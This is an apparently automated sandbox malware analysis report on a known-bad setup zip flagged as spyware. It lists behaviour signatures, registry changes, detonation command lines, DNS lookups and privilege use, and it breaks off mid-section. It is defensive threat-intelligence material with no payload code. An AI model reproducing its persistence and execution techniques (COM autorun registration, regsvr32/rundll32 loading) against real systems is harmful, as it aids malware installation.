Malware Analysis Report

2024-11-30 06:36

Sample ID 240612-vwj2tswhll
Target __x64___setup___x32___.zip
SHA256 bb736b45e2f6f8cdfbef1ffb0cb283126e184baa52a80cac92b0e4c77dfbb911
Tags
persistence execution spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bb736b45e2f6f8cdfbef1ffb0cb283126e184baa52a80cac92b0e4c77dfbb911

Threat Level: Known bad

The file __x64___setup___x32___.zip was found to be: Known bad.

Malicious Activity Summary

persistence execution spyware

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Registers COM server for autorun

Enumerates connected drives

Downloads MZ/PE file

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Checks computer location settings

Suspicious use of SetThreadContext

Loads dropped DLL

Drops file in Windows directory

Executes dropped EXE

Enumerates physical storage devices

Unsigned PE

Command and Scripting Interpreter: PowerShell

Modifies registry class

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 17:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

124s

Max time network

130s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Wpc\Wpc.dll

Signatures

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D3EE15B5-9DAF-4375-9FE2-A999EE9775A4}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{fb4b2996-c3bd-4910-9619-97cfd0694d56} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8c0133a4-442e-461a-8757-fad2f5bd37e4}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{95E87780-E158-489E-B452-BBB850790715}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FFCCBDB8-0992-4C30-B0F1-1CBB09C240AA}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CF61BE5D-40C3-5484-846A-3F82B8BA5738} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3f7f23cb-ba07-4401-a49d-8b9222205723}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{54465C6D-E2CF-4668-BC22-88DB466DC869} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F49DB551-2E53-4A90-8896-0122E803AC77} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4FF40A0F-3F3B-4D7C-A41B-4F39D7B44D05}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{62B5AC20-FB8B-492F-A72A-5A260C27BB90}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4A42C4B5-5821-423D-A7D8-078809AAE4C0}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D4C428B7-7120-4DC4-A595-208696109381}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2e38df62-9b90-4fa6-89c1-4b8d2ffb3573}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{28B4D88B-E072-49E6-804D-26EDBE21A7B9} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BEF54196-2D02-4A26-B6E5-D65AF295D0F1}\ = "IWPCProviderConfig" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FFCCBDB8-0992-4C30-B0F1-1CBB09C240AA}\ = "IWPCWebSettings" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E26AA555-BB67-49DF-BEF8-40EE948FC6BC}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{72AE1A16-C705-54E7-B1C4-FC05A0E07A77} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ae3399b2-c7d5-5f1b-9fb9-f8bd81e9f9be}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{694866df-66b2-4dc3-96b1-f090eedee255}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1509730d-58b9-4cde-b062-7ff33dc10ff6}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{f49db551-2e53-4a90-8896-0122e803ac77}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7bd29fce-6a16-4cc2-81e0-db6b6569d729} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{50B6A267-C4BD-450B-ADB5-759073837C9E}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8FDF6CA1-0189-47E4-B670-1A8A4636E340}\NumMethods\ = "6" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D3EE15B5-9DAF-4375-9FE2-A999EE9775A4}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8c0133a4-442e-461a-8757-fad2f5bd37e4} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3f7f23cb-ba07-4401-a49d-8b9222205723}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDD6DCE1-D177-4C24-B068-D699FCFE885E} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{28B4D88B-E072-49E6-804D-26EDBE21A7B9}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4A42C4B5-5821-423D-A7D8-078809AAE4C0}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E26AA555-BB67-49DF-BEF8-40EE948FC6BC} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E26AA555-BB67-49DF-BEF8-40EE948FC6BC}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2e38df62-9b90-4fa6-89c1-4b8d2ffb3573}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1509730d-58b9-4cde-b062-7ff33dc10ff6} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2818DF95-3B08-4D8B-A063-0ECFBF3F6220}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{41EBA572-23ED-4779-BEC1-8DF96206C44C}\ = "IWPCProviderSupport" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{28B4D88B-E072-49E6-804D-26EDBE21A7B9}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{62B5AC20-FB8B-492F-A72A-5A260C27BB90}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5E1D24C6-7887-410F-AF47-363C0FDD1203}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{72ae1a16-c705-54e7-b1c4-fc05a0e07a77} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E38DF62-9B90-4FA6-89C1-4B8D2FFB3573} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{cf8e5ae3-3737-40b5-849b-d812e50ff55a}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0f2495e9-edd6-46ef-a1f3-36713f4b5114}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{f49db551-2e53-4a90-8896-0122e803ac77}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{cf8e5ae3-3737-40b5-849b-d812e50ff55a}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4FF40A0F-3F3B-4D7C-A41B-4F39D7B44D05} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BEF54196-2D02-4A26-B6E5-D65AF295D0F1}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8FDF6CA1-0189-47E4-B670-1A8A4636E340}\ProxyStubClsid32\ = "{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4A42C4B5-5821-423D-A7D8-078809AAE4C0}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5E1D24C6-7887-410F-AF47-363C0FDD1203}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1509730D-58B9-4CDE-B062-7FF33DC10FF6} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{62B5AC20-FB8B-492F-A72A-5A260C27BB90}\NumMethods\ = "5" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ae3399b2-c7d5-5f1b-9fb9-f8bd81e9f9be}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D4C428B7-7120-4DC4-A595-208696109381} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3f7f23cb-ba07-4401-a49d-8b9222205723} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8C0133A4-442E-461A-8757-FAD2F5BD37E4} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2818DF95-3B08-4D8B-A063-0ECFBF3F6220}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E67ED90B-BA23-4CDE-B322-72865CAF1DEE}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{41EBA572-23ED-4779-BEC1-8DF96206C44C}\NumMethods\ = "4" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BEF54196-2D02-4A26-B6E5-D65AF295D0F1}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D4C428B7-7120-4DC4-A595-208696109381}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{860c0179-be01-546d-a9ce-5956464c98ab} C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Wpc\Wpc.dll

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4192,i,1305347165619645738,15927664461101562802,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 74.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

150s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\comuid\DavSyncProvider.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\comuid\DavSyncProvider.dll,#1

Network

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:23

Platform

win10v2004-20240611-en

Max time kernel

147s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\comuid\dynamoapi.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\comuid\dynamoapi.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-12 17:20

Reported

2024-06-12 17:25

Platform

win7-20240611-en

Max time kernel

122s

Max time network

129s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f76823f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI82D6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E27.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8596.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI86C0.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76823d.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76823d.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76823a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76823a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI84BB.tmp C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Processes

